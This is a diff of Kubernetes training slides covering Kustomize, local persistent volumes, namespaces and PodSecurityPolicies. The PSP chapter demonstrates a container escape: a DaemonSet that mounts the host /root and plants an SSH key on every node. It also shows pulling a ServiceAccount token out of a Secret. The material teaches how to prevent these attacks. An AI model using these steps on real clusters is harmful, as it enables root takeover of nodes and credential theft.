|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Access the web UI
|
||||
|
||||
- `ship init` tells us to connect on `localhost:8800`
|
||||
|
||||
- We need to replace `localhost` with the address of our node
|
||||
|
||||
(since we run on a remote machine)
|
||||
|
||||
- Follow the steps in the web UI, and change one parameter
|
||||
|
||||
(e.g. set the number of replicas in the worker Deployment)
|
||||
|
||||
- Complete the web workflow, and go back to the CLI
|
||||
|
||||
---
|
||||
|
||||
## Inspect the results
|
||||
|
||||
- Look at the content of our directory
|
||||
|
||||
- `base` contains the kubercoins repository + a `kustomization.yaml` file
|
||||
|
||||
- `overlays/ship` contains the Kustomize overlay referencing the base + our patch(es)
|
||||
|
||||
- `rendered.yaml` is a YAML bundle containing the patched application
|
||||
|
||||
- `.ship` contains a state file used by Ship
|
||||
|
||||
---
|
||||
|
||||
## Using the results
|
||||
|
||||
- We can `kubectl apply -f rendered.yaml`
|
||||
|
||||
(on any version of Kubernetes)
|
||||
|
||||
- Starting with Kubernetes 1.14, we can apply the overlay directly with:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship
|
||||
```
|
||||
|
||||
- But let's not do that for now!
|
||||
|
||||
- We will create a new copy of DockerCoins in another namespace
|
||||
|
||||
---
|
||||
|
||||
## Deploy DockerCoins with Kustomize
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace kustomcoins
|
||||
```
|
||||
|
||||
- Deploy DockerCoins:
|
||||
```bash
|
||||
kubectl apply -f rendered.yaml --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Or, with Kubernetes 1.14, you can also do this:
|
||||
```bash
|
||||
kubectl apply -k overlays/ship --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Checking our new copy of DockerCoins
|
||||
|
||||
- We can check the worker logs, or the web UI
|
||||
|
||||
.exercise[
|
||||
|
||||
- Retrieve the NodePort number of the web UI:
|
||||
```bash
|
||||
kubectl get service webui --namespace=kustomcoins
|
||||
```
|
||||
|
||||
- Open it in a web browser
|
||||
|
||||
- Look at the worker logs:
|
||||
```bash
|
||||
kubectl logs deploy/worker --tail=10 --follow --namespace=kustomcoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: it might take a minute or two for the worker to start.
|
||||
@@ -120,7 +120,7 @@
|
||||
|
||||
- Team "build" ships ready-to-run manifests
|
||||
|
||||
(YAML, Helm Charts, Kustomize ...)
|
||||
(YAML, Helm charts, Kustomize ...)
|
||||
|
||||
- Team "run" adjusts some parameters and monitors the application
|
||||
|
||||
|
||||
244
slides/k8s/local-persistent-volumes.md
Normal file
@@ -0,0 +1,244 @@
|
||||
# Local Persistent Volumes
|
||||
|
||||
- We want to run that Consul cluster *and* actually persist data
|
||||
|
||||
- But we don't have a distributed storage system
|
||||
|
||||
- We are going to use local volumes instead
|
||||
|
||||
(similar conceptually to `hostPath` volumes)
|
||||
|
||||
- We can use local volumes without installing extra plugins
|
||||
|
||||
- However, they are tied to a node
|
||||
|
||||
- If that node goes down, the volume becomes unavailable
|
||||
|
||||
---
|
||||
|
||||
## With or without dynamic provisioning
|
||||
|
||||
- We will deploy a Consul cluster *with* persistence
|
||||
|
||||
- That cluster's StatefulSet will create PVCs
|
||||
|
||||
- These PVCs will remain unbound¹ until we create local volumes manually
|
||||
|
||||
(we will basically do the job of the dynamic provisioner)
|
||||
|
||||
- Then, we will see how to automate that with a dynamic provisioner
|
||||
|
||||
.footnote[¹Unbound = without an associated Persistent Volume.]
|
||||
|
||||
---
|
||||
|
||||
## Work in a separate namespace
|
||||
|
||||
- To avoid conflicts with existing resources, let's create and use a new namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create a new namespace:
|
||||
```bash
|
||||
kubectl create namespace orange
|
||||
```
|
||||
|
||||
- Switch to that namespace:
|
||||
```bash
|
||||
kns orange
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
.warning[Make sure to call that namespace `orange`, because that name is hardcoded in the YAML files.]
|
||||
|
||||
---
|
||||
|
||||
## Deploying Consul
|
||||
|
||||
- We will use a slightly different YAML file
|
||||
|
||||
- The only differences between that file and the previous one are:
|
||||
|
||||
- `volumeClaimTemplate` defined in the Stateful Set spec
|
||||
|
||||
- the corresponding `volumeMounts` in the Pod spec
|
||||
|
||||
- the namespace `orange` used for discovery of Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Apply the persistent Consul YAML file:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/persistent-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Observing the situation
|
||||
|
||||
- Let's look at Persistent Volume Claims and Pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that we now have an unbound Persistent Volume Claim:
|
||||
```bash
|
||||
kubectl get pvc
|
||||
```
|
||||
|
||||
- We don't have any Persistent Volume:
|
||||
```bash
|
||||
kubectl get pv
|
||||
```
|
||||
|
||||
- The Pod `consul-0` is not scheduled yet:
|
||||
```bash
|
||||
kubectl get pods -o wide
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
*Hint: leave these commands running with `-w` in different windows.*
|
||||
|
||||
---
|
||||
|
||||
## Explanations
|
||||
|
||||
- In a Stateful Set, the Pods are started one by one
|
||||
|
||||
- `consul-1` won't be created until `consul-0` is running
|
||||
|
||||
- `consul-0` has a dependency on an unbound Persistent Volume Claim
|
||||
|
||||
- The scheduler won't schedule the Pod until the PVC is bound
|
||||
|
||||
(because the PVC might be bound to a volume that is only available on a subset of nodes; for instance, EBS volumes are tied to an availability zone)
|
||||
|
||||
---
|
||||
|
||||
## Creating Persistent Volumes
|
||||
|
||||
- Let's create 3 local directories (`/mnt/consul`) on node2, node3, node4
|
||||
|
||||
- Then create 3 Persistent Volumes corresponding to these directories
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create the local directories:
|
||||
```bash
|
||||
for NODE in node2 node3 node4; do
|
||||
ssh $NODE sudo mkdir -p /mnt/consul
|
||||
done
|
||||
```
|
||||
|
||||
- Create the PV objects:
|
||||
```bash
|
||||
kubectl apply -f ~/container.training/k8s/volumes-for-consul.yaml
|
||||
```
|
||||
|
||||
]
|
||||
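For reference, each of these PVs might look roughly like this sketch (the actual `volumes-for-consul.yaml` may differ):

```yaml
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
spec:
  capacity:
    storage: 1Gi
  accessModes: [ ReadWriteOnce ]
  local:
    path: /mnt/consul
  # a local volume must be pinned to its node
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values: [ node2 ]
```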
|
||||
---
|
||||
|
||||
## Check our Consul cluster
|
||||
|
||||
- The PVs that we created will be automatically matched with the PVCs
|
||||
|
||||
- Once a PVC is bound, its pod can start normally
|
||||
|
||||
- Once the pod `consul-0` has started, `consul-1` can be created, etc.
|
||||
|
||||
- Eventually, our Consul cluster is up, and backed by "persistent" volumes
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check that our Consul cluster indeed has 3 members:
|
||||
```bash
|
||||
kubectl exec consul-0 consul members
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (1/2)
|
||||
|
||||
- The size of the Persistent Volumes is bogus
|
||||
|
||||
(it is used when matching PVs and PVCs together, but there is no actual quota or limit)
|
||||
|
||||
---
|
||||
|
||||
## Devil is in the details (2/2)
|
||||
|
||||
- This specific example worked because we had exactly 1 free PV per node:
|
||||
|
||||
- if we had created multiple PVs per node ...
|
||||
|
||||
- we could have ended with two PVCs bound to PVs on the same node ...
|
||||
|
||||
- which would have required two pods to be on the same node ...
|
||||
|
||||
- which is forbidden by the anti-affinity constraints in the StatefulSet
|
||||
|
||||
- To avoid that, we need to associate the PVs with a Storage Class that has:
|
||||
```yaml
|
||||
volumeBindingMode: WaitForFirstConsumer
|
||||
```
|
||||
(this means that a PVC will be bound to a PV only after being used by a Pod)
|
||||
|
||||
- See [this blog post](https://kubernetes.io/blog/2018/04/13/local-persistent-volumes-beta/) for more details
|
||||
|
||||
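Such a Storage Class for manually-created local volumes can be as simple as this sketch (`local-storage` is an arbitrary name):

```yaml
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-storage
provisioner: kubernetes.io/no-provisioner
volumeBindingMode: WaitForFirstConsumer
```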
---
|
||||
|
||||
## Bulk provisioning
|
||||
|
||||
- It's not practical to manually create directories and PVs for each app
|
||||
|
||||
- We *could* pre-provision a number of PVs across our fleet
|
||||
|
||||
- We could even automate that with a Daemon Set:
|
||||
|
||||
- creating a number of directories on each node
|
||||
|
||||
- creating the corresponding PV objects
|
||||
|
||||
- We also need to recycle volumes
|
||||
|
||||
- ... This can quickly get out of hand
|
||||
|
||||
---
|
||||
|
||||
## Dynamic provisioning
|
||||
|
||||
- We could also write our own provisioner, which would:
|
||||
|
||||
- watch the PVCs across all namespaces
|
||||
|
||||
- when a PVC is created, create a corresponding PV on a node
|
||||
|
||||
- Or we could use one of the dynamic provisioners for local persistent volumes
|
||||
|
||||
(for instance the [Rancher local path provisioner](https://github.com/rancher/local-path-provisioner))
|
||||
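Installing that provisioner boils down to applying its manifest (URL taken from the project's README at the time of writing; double-check it before use):

```bash
kubectl apply -f https://raw.githubusercontent.com/rancher/local-path-provisioner/master/deploy/local-path-storage.yaml
```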
|
||||
---
|
||||
|
||||
## Strategies for local persistent volumes
|
||||
|
||||
- Remember, when a node goes down, the volumes on that node become unavailable
|
||||
|
||||
- High availability will require another layer of replication
|
||||
|
||||
(like what we've just seen with Consul; or primary/secondary; etc)
|
||||
|
||||
- Pre-provisioning PVs makes sense for machines with local storage
|
||||
|
||||
(e.g. cloud instance storage; or storage directly attached to a physical machine)
|
||||
|
||||
- Dynamic provisioning makes sense for a large number of applications
|
||||
|
||||
(when we can't or won't dedicate a whole disk to a volume)
|
||||
|
||||
- It's possible to mix both (using distinct Storage Classes)
|
||||
@@ -6,6 +6,24 @@
|
||||
|
||||
---
|
||||
|
||||
## Requirements
|
||||
|
||||
.warning[The exercises in this chapter should be done *on your local machine*.]
|
||||
|
||||
- `kubectl` is officially available on Linux, macOS, Windows
|
||||
|
||||
(and unofficially anywhere we can build and run Go binaries)
|
||||
|
||||
- You may skip these exercises if you are following along from:
|
||||
|
||||
- a tablet or phone
|
||||
|
||||
- a web-based terminal
|
||||
|
||||
- an environment where you can't install and run new binaries
|
||||
|
||||
---
|
||||
|
||||
## Installing `kubectl`
|
||||
|
||||
- If you already have `kubectl` on your local machine, you can skip this
|
||||
@@ -16,11 +34,11 @@
|
||||
|
||||
- Download the `kubectl` binary from one of these links:
|
||||
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/linux/amd64/kubectl)
|
||||
[Linux](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/linux/amd64/kubectl)
|
||||
|
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/darwin/amd64/kubectl)
|
||||
[macOS](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/darwin/amd64/kubectl)
|
||||
|
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.1/bin/windows/amd64/kubectl.exe)
|
||||
[Windows](https://storage.googleapis.com/kubernetes-release/release/v1.14.2/bin/windows/amd64/kubectl.exe)
|
||||
|
||||
- On Linux and macOS, make the binary executable with `chmod +x kubectl`
|
||||
|
||||
@@ -65,9 +83,16 @@ Platform:"linux/amd64"}
|
||||
|
||||
- If you have never used `kubectl` on your machine before: nothing to do!
|
||||
|
||||
- If you have already used `kubectl` to control a Kubernetes cluster before:
|
||||
.exercise[
|
||||
|
||||
- rename `~/.kube/config` to e.g. `~/.kube/config.bak`
|
||||
- Make a copy of `~/.kube/config`; if you are using macOS or Linux, you can do:
|
||||
```bash
|
||||
cp ~/.kube/config ~/.kube/config.before.training
|
||||
```
|
||||
|
||||
- If you are using Windows, you will need to adapt this command
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -1,26 +1,65 @@
|
||||
# Namespaces
|
||||
|
||||
- We would like to deploy another copy of DockerCoins on our cluster
|
||||
|
||||
- We could rename all our deployments and services:
|
||||
|
||||
hasher → hasher2, redis → redis2, rng → rng2, etc.
|
||||
|
||||
- That would require updating the code
|
||||
|
||||
- There has to be a better way!
|
||||
|
||||
--
|
||||
|
||||
- As hinted by the title of this section, we will use *namespaces*
|
||||
|
||||
---
|
||||
|
||||
## Identifying a resource
|
||||
|
||||
- We cannot have two resources with the same name
|
||||
|
||||
(Or can we...?)
|
||||
(or can we...?)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources *of the same type* with the same name
|
||||
- We cannot have two resources *of the same kind* with the same name
|
||||
|
||||
(But it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set!)
|
||||
(but it's OK to have a `rng` service, a `rng` deployment, and a `rng` daemon set)
|
||||
|
||||
--
|
||||
|
||||
- We cannot have two resources of the same type with the same name *in the same namespace*
|
||||
- We cannot have two resources of the same kind with the same name *in the same namespace*
|
||||
|
||||
(But it's OK to have e.g. two `rng` services in different namespaces!)
|
||||
(but it's OK to have e.g. two `rng` services in different namespaces)
|
||||
|
||||
--
|
||||
|
||||
- In other words: **the tuple *(type, name, namespace)* needs to be unique**
|
||||
- Except for resources that exist at the *cluster scope*
|
||||
|
||||
(In the resource YAML, the type is called `Kind`)
|
||||
(these do not belong to a namespace)
|
||||
|
||||
---
|
||||
|
||||
## Uniquely identifying a resource
|
||||
|
||||
- For *namespaced* resources:
|
||||
|
||||
the tuple *(kind, name, namespace)* needs to be unique
|
||||
|
||||
- For resources at the *cluster scope*:
|
||||
|
||||
the tuple *(kind, name)* needs to be unique
|
||||
|
||||
.exercise[
|
||||
|
||||
- List resource types again, and check the NAMESPACED column:
|
||||
```bash
|
||||
kubectl api-resources
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
@@ -42,12 +81,16 @@
|
||||
|
||||
## Creating namespaces
|
||||
|
||||
- Creating a namespace is done with the `kubectl create namespace` command:
|
||||
- Let's see two identical methods to create a namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- We can use `kubectl create namespace`:
|
||||
```bash
|
||||
kubectl create namespace blue
|
||||
```
|
||||
|
||||
- We can also get fancy and use a very minimal YAML snippet, e.g.:
|
||||
- Or we can construct a very minimal YAML snippet:
|
||||
```bash
|
||||
kubectl apply -f- <<EOF
|
||||
apiVersion: v1
|
||||
@@ -57,9 +100,9 @@
|
||||
EOF
|
||||
```
|
||||
|
||||
- The two methods above are identical
|
||||
]
|
||||
|
||||
- If we are using a tool like Helm, it will create namespaces automatically
|
||||
- Some tools like Helm will create namespaces automatically when needed
|
||||
|
||||
---
|
||||
|
||||
@@ -155,7 +198,7 @@
|
||||
|
||||
## Using our new namespace
|
||||
|
||||
- Let's check that we are in our new namespace, then deploy the DockerCoins chart
|
||||
- Let's check that we are in our new namespace, then deploy a new copy of Dockercoins
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -164,21 +207,38 @@
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
- Deploy DockerCoins:
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Deploying DockerCoins with YAML files
|
||||
|
||||
- The GitHub repository `jpetazzo/kubercoins` contains everything we need!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Clone the kubercoins repository:
|
||||
```bash
|
||||
helm install dockercoins
|
||||
cd ~
|
||||
git clone https://github.com/jpetazzo/kubercoins
|
||||
```
|
||||
|
||||
- Create all the DockerCoins resources:
|
||||
```bash
|
||||
kubectl create -f kubercoins
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
In the last command line, `dockercoins` is just the local path where
|
||||
we created our Helm chart before.
|
||||
If the argument after `-f` is a directory, all the files in that directory are processed.
|
||||
|
||||
The subdirectories are *not* processed, unless we also add the `-R` flag.
|
||||
|
||||
---
|
||||
|
||||
## Viewing the deployed app
|
||||
|
||||
- Let's see if our Helm chart worked correctly!
|
||||
- Let's see if this worked correctly!
|
||||
|
||||
.exercise[
|
||||
|
||||
@@ -191,46 +251,7 @@ we created our Helm chart before.
|
||||
|
||||
]
|
||||
|
||||
If the graph shows up but stays at zero, check the next slide!
|
||||
|
||||
---
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
If you did the exercises from the chapter about labels and selectors,
|
||||
the app that you just created may not work, because the `rng` service
|
||||
selector has `enabled=yes` but the pods created by the `rng` daemon set
|
||||
do not have that label.
|
||||
|
||||
How can we troubleshoot that?
|
||||
|
||||
- Query individual services manually
|
||||
|
||||
→ the `rng` service will time out
|
||||
|
||||
- Inspect the services with `kubectl describe service`
|
||||
|
||||
→ the `rng` service will have an empty list of backends
|
||||
|
||||
---
|
||||
|
||||
## Fixing the broken service
|
||||
|
||||
The easiest option is to add the `enabled=yes` label to the relevant pods.
|
||||
|
||||
.exercise[
|
||||
|
||||
- Add the `enabled` label to the pods of the `rng` daemon set:
|
||||
```bash
|
||||
kubectl label pods -l app=rng enabled=yes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The *best* option is to change either the service definition, or the
|
||||
daemon set definition, so that their respective selectors match correctly.
|
||||
|
||||
*This is left as an exercise for the reader!*
|
||||
If the graph shows up but stays at zero, give it a minute or two!
|
||||
|
||||
---
|
||||
|
||||
|
||||
@@ -11,6 +11,7 @@
|
||||
|
||||
- Deploy everything else:
|
||||
```bash
|
||||
set -u
|
||||
for SERVICE in hasher rng webui worker; do
|
||||
kubectl create deployment $SERVICE --image=$REGISTRY/$SERVICE:$TAG
|
||||
done
|
||||
|
||||
601
slides/k8s/podsecuritypolicy.md
Normal file
@@ -0,0 +1,601 @@

# Pod Security Policies

- By default, our pods and containers can do *everything*

  (including taking over the entire cluster)

- We are going to show an example of a malicious pod

- Then we will explain how to avoid this with PodSecurityPolicies

- We will illustrate this by creating a non-privileged user limited to a namespace

---

## Setting up a namespace

- Let's create a new namespace called "green"

.exercise[

- Create the "green" namespace:
  ```bash
  kubectl create namespace green
  ```

- Change to that namespace:
  ```bash
  kns green
  ```

]

---

## Using limited credentials

- When a namespace is created, a `default` ServiceAccount is added

- By default, this ServiceAccount doesn't have any access rights

- We will use this ServiceAccount as our non-privileged user

- We will obtain this ServiceAccount's token and add it to a context

- Then we will give basic access rights to this ServiceAccount

---

## Obtaining the ServiceAccount's token

- The token is stored in a Secret

- The Secret is listed in the ServiceAccount

.exercise[

- Obtain the name of the Secret from the ServiceAccount:
  ```bash
  SECRET=$(kubectl get sa default -o jsonpath={.secrets[0].name})
  ```

- Extract the token from the Secret object:
  ```bash
  TOKEN=$(kubectl get secrets $SECRET -o jsonpath={.data.token} | base64 -d)
  ```

]

---

class: extra-details

## Inspecting a Kubernetes token

- Kubernetes tokens are JSON Web Tokens

  (as defined by [RFC 7519](https://tools.ietf.org/html/rfc7519))

- We can view their content (and even verify them) easily

.exercise[

- Display the token that we obtained:
  ```bash
  echo $TOKEN
  ```

- Copy-paste the token in the verification form on https://jwt.io

]

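If we prefer to stay in the terminal, we can decode the payload by hand. A minimal sketch (the payload is the second dot-separated field of the token; it is base64url-encoded, so we translate the alphabet and fix up padding before decoding):

```bash
PAYLOAD=$(echo $TOKEN | cut -d. -f2 | tr '_-' '/+')
# base64url omits padding; add '=' until the length is a multiple of 4
while [ $(( ${#PAYLOAD} % 4 )) -ne 0 ]; do PAYLOAD=$PAYLOAD=; done
echo $PAYLOAD | base64 -d
```
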
---

## Authenticating using the ServiceAccount token

- Let's create a new *context* accessing our cluster with that token

.exercise[

- First, add the token credentials to our kubeconfig file:
  ```bash
  kubectl config set-credentials green --token=$TOKEN
  ```

- Then, create a new context using these credentials:
  ```bash
  kubectl config set-context green --user=green --cluster=kubernetes
  ```

- Check the results:
  ```bash
  kubectl config get-contexts
  ```

]

---

## Using the new context

- Normally, this context doesn't let us access *anything* (yet)

.exercise[

- Change to the new context with one of these two commands:
  ```bash
  kctx green
  kubectl config use-context green
  ```

- Also change to the green namespace in that context:
  ```bash
  kns green
  ```

- Confirm that we don't have access to anything:
  ```bash
  kubectl get all
  ```

]

---

## Giving basic access rights

- Let's bind the ClusterRole `edit` to our ServiceAccount

- To allow access only to the namespace, we use a RoleBinding

  (instead of a ClusterRoleBinding, which would give global access)

.exercise[

- Switch back to `cluster-admin`:
  ```bash
  kctx -
  ```

- Create the Role Binding:
  ```bash
  kubectl create rolebinding green --clusterrole=edit --serviceaccount=green:default
  ```

]

---

## Verifying access rights

- Let's switch back to the `green` context and check that we have rights

.exercise[

- Switch back to `green`:
  ```bash
  kctx green
  ```

- Check our permissions:
  ```bash
  kubectl get all
  ```

]

We should see an empty list.

(Better than a series of permission errors!)

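To see our permissions spelled out (instead of inferring them from errors), we can also ask the API server directly. This assumes a kubectl version recent enough to support `auth can-i --list`:

```bash
# List the verbs we are allowed to use in the current namespace
kubectl auth can-i --list
```
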
---

## Creating a basic Deployment

- Just to demonstrate that everything works correctly, deploy NGINX

.exercise[

- Create a Deployment using the official NGINX image:
  ```bash
  kubectl create deployment web --image=nginx
  ```

- Confirm that the Deployment, ReplicaSet, and Pod exist, and that the Pod is running:
  ```bash
  kubectl get all
  ```

]

---

## One example of malicious pods

- We will now show an escalation technique in action

- We will deploy a DaemonSet that adds our SSH key to the root account

  (on *each* node of the cluster)

- The Pods of the DaemonSet will do so by mounting `/root` from the host

.exercise[

- Check the file `k8s/hacktheplanet.yaml` with a text editor:
  ```bash
  vim ~/container.training/k8s/hacktheplanet.yaml
  ```

- If you would like, change the SSH key (by changing the GitHub user name)

]

---

## Deploying the malicious pods

- Let's deploy our "exploit"!

.exercise[

- Create the DaemonSet:
  ```bash
  kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
  ```

- Check that the pods are running:
  ```bash
  kubectl get pods
  ```

- Confirm that the SSH key was added to the node's root account:
  ```bash
  sudo cat /root/.ssh/authorized_keys
  ```

]

---

## Cleaning up

- Before setting up our PodSecurityPolicies, clean up that namespace

.exercise[

- Remove the DaemonSet:
  ```bash
  kubectl delete daemonset hacktheplanet
  ```

- Remove the Deployment:
  ```bash
  kubectl delete deployment web
  ```

]

---

## Pod Security Policies in theory

- To use PSPs, we need to activate their specific *admission controller*

- That admission controller will intercept each pod creation attempt

- It will look at:

  - *who/what* is creating the pod

  - which PodSecurityPolicies they can use

  - which PodSecurityPolicies can be used by the Pod's ServiceAccount

- Then it will compare the Pod with each PodSecurityPolicy one by one

- If a PodSecurityPolicy accepts all the parameters of the Pod, it is created

- Otherwise, the Pod creation is denied and it won't even show up in `kubectl get pods`

---

## Pod Security Policies fine print

- With RBAC, using a PSP corresponds to the verb `use` on the PSP

  (that makes sense, right?)

- If no PSP is defined, no Pod can be created

  (even by cluster admins)

- Pods that are already running are *not* affected

- If we create a Pod directly, it can use a PSP to which *we* have access

- If the Pod is created by e.g. a ReplicaSet or DaemonSet, it's different:

  - the ReplicaSet / DaemonSet controllers don't have access to *our* policies

  - therefore, we need to give access to the PSP to the Pod's ServiceAccount

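Concretely, a ClusterRole granting that `use` verb could be sketched like this (a hypothetical example; the roles we create later come from YAML files in the repository and may differ in detail):

```yaml
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: [ policy ]
  resources: [ podsecuritypolicies ]
  resourceNames: [ restricted ]   # grant "use" on this specific policy only
  verbs: [ use ]
```
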
---

## Pod Security Policies in practice

- We are going to enable the PodSecurityPolicy admission controller

- At that point, we won't be able to create any more pods (!)

- Then we will create a couple of PodSecurityPolicies

- ... And associated ClusterRoles (giving `use` access to the policies)

- Then we will create RoleBindings to grant these roles to ServiceAccounts

- We will verify that we can't run our "exploit" anymore

---

## Enabling Pod Security Policies

- To enable Pod Security Policies, we need to enable their *admission plugin*

- This is done by adding a flag to the API server

- On clusters deployed with `kubeadm`, the control plane runs in static pods

- These pods are defined in YAML files located in `/etc/kubernetes/manifests`

- Kubelet watches this directory

- Each time a file is added/removed there, kubelet creates/deletes the corresponding pod

- Updating a file causes the pod to be deleted and recreated

---

## Updating the API server flags

- Let's edit the manifest for the API server pod

.exercise[

- Have a look at the static pods:
  ```bash
  ls -l /etc/kubernetes/manifests
  ```

- Edit the one corresponding to the API server:
  ```bash
  sudo vim /etc/kubernetes/manifests/kube-apiserver.yaml
  ```

]

---

## Adding the PSP admission plugin

- There should already be a line with `--enable-admission-plugins=...`

- Let's add `PodSecurityPolicy` on that line

.exercise[

- Locate the line with `--enable-admission-plugins=`

- Add `PodSecurityPolicy`

  (It should read `--enable-admission-plugins=NodeRestriction,PodSecurityPolicy`)

- Save, quit

]

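For reference, the relevant part of the manifest should end up looking roughly like this (a sketch; the surrounding flags depend on the kubeadm version):

```yaml
# excerpt of /etc/kubernetes/manifests/kube-apiserver.yaml
spec:
  containers:
  - name: kube-apiserver
    command:
    - kube-apiserver
    - --enable-admission-plugins=NodeRestriction,PodSecurityPolicy
    # ...many other flags omitted...
```
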
---

## Waiting for the API server to restart

- The kubelet detects that the file was modified

- It kills the API server pod, and starts a new one

- During that time, the API server is unavailable

.exercise[

- Wait until the API server is available again

]

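One way to wait from the shell (a minimal sketch; any cheap read-only request would do):

```bash
# Poll the API server until it responds again
while ! kubectl get nodes >/dev/null 2>&1; do
  sleep 1
done
```
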
---

## Check that the admission plugin is active

- Normally, we can't create any Pod at this point

.exercise[

- Try to create a Pod directly:
  ```bash
  kubectl run testpsp1 --image=nginx --restart=Never
  ```

- Try to create a Deployment:
  ```bash
  kubectl run testpsp2 --image=nginx
  ```

- Look at existing resources:
  ```bash
  kubectl get all
  ```

]

We can get hints about what's happening by looking at the ReplicaSet and the Events.

---

## Introducing our Pod Security Policies

- We will create two policies:

  - privileged (allows everything)

  - restricted (blocks some unsafe mechanisms)

- For each policy, we also need an associated ClusterRole granting *use*

---

## Creating our Pod Security Policies

- We have a couple of files, each defining a PSP and associated ClusterRole:

  - k8s/psp-privileged.yaml: policy `privileged`, role `psp:privileged`
  - k8s/psp-restricted.yaml: policy `restricted`, role `psp:restricted`

.exercise[

- Create both policies and their associated ClusterRoles:
  ```bash
  kubectl create -f ~/container.training/k8s/psp-restricted.yaml
  kubectl create -f ~/container.training/k8s/psp-privileged.yaml
  ```
]

- The privileged policy comes from [the Kubernetes documentation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#example-policies)

- The restricted policy is inspired by that same documentation page

---

## Binding the restricted policy

- Let's bind the role `psp:restricted` to ServiceAccount `green:default`

  (aka the default ServiceAccount in the green Namespace)

.exercise[

- Create the following RoleBinding:
  ```bash
  kubectl create rolebinding psp:restricted \
          --clusterrole=psp:restricted \
          --serviceaccount=green:default
  ```

]

---

## Trying it out

- Let's switch to the `green` context, and try to create resources

.exercise[

- Switch to the `green` context:
  ```bash
  kctx green
  ```

- Create a simple Deployment:
  ```bash
  kubectl create deployment web --image=nginx
  ```

- Look at the Pods that have been created:
  ```bash
  kubectl get all
  ```

]

---

## Trying to hack the cluster

- Let's create the same DaemonSet we used earlier

.exercise[

- Create a hostile DaemonSet:
  ```bash
  kubectl create -f ~/container.training/k8s/hacktheplanet.yaml
  ```

- Look at the state of the namespace:
  ```bash
  kubectl get all
  ```

]

---

class: extra-details

## What's in our restricted policy?

- The restricted PSP is similar to the one provided in the docs, but:

  - it allows containers to run as root

  - it doesn't drop capabilities

- Many containers run as root by default, and would require additional tweaks

- Many containers use e.g. `chown`, which requires a specific capability

  (that's the case for the NGINX official image, for instance)

- We still block: hostPath, privileged containers, and much more!

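As an illustration, such a restricted policy could be sketched like this (hypothetical field choices; the actual `k8s/psp-restricted.yaml` may differ in details):

```yaml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: restricted
spec:
  privileged: false        # no privileged containers
  hostNetwork: false
  hostIPC: false
  hostPID: false
  runAsUser:
    rule: RunAsAny         # running as root remains allowed
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes:                 # note that hostPath is absent from this list
  - configMap
  - downwardAPI
  - emptyDir
  - projected
  - secret
  - persistentVolumeClaim
```
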
---

class: extra-details

## The case of static pods

- If we list the pods in the `kube-system` namespace, `kube-apiserver` is missing

- However, the API server is obviously running

  (otherwise, `kubectl get pods --namespace=kube-system` wouldn't work)

- The API server Pod is created directly by kubelet

  (without going through the PSP admission plugin)

- Then, kubelet creates a "mirror pod" representing that Pod in etcd

- That "mirror pod" creation goes through the PSP admission plugin

- And it gets blocked!

- This can be fixed by binding `psp:privileged` to group `system:nodes`

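A sketch of that fix (the binding name is arbitrary):

```bash
# Allow kubelets (members of group system:nodes) to use the privileged policy
kubectl create clusterrolebinding psp:nodes \
        --clusterrole=psp:privileged --group=system:nodes
```
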
---

## .warning[Before moving on...]

- Our cluster is currently broken

  (we can't create pods in kube-system, default, ...)

- We need to either:

  - disable the PSP admission plugin

  - allow relevant users and groups to use the PSPs

- For instance, we could:

  - bind `psp:restricted` to the group `system:authenticated`

  - bind `psp:privileged` to the ServiceAccount `kube-system:default`

  (both sketched below)

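Those two bindings could be sketched as follows (the binding names are arbitrary):

```bash
kubectl create clusterrolebinding psp:authenticated \
        --clusterrole=psp:restricted --group=system:authenticated
kubectl create rolebinding psp:privileged --namespace=kube-system \
        --clusterrole=psp:privileged --serviceaccount=kube-system:default
```
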
@@ -12,7 +12,7 @@

- an *alert manager* to notify us according to metrics values or trends

- We are going to deploy it on our Kubernetes cluster and see how to query it
- We are going to use it to collect and query some metrics on our Kubernetes cluster

---

@@ -145,7 +145,28 @@ scrape_configs:

(it will even be gentler on the I/O subsystem since it needs to write less)

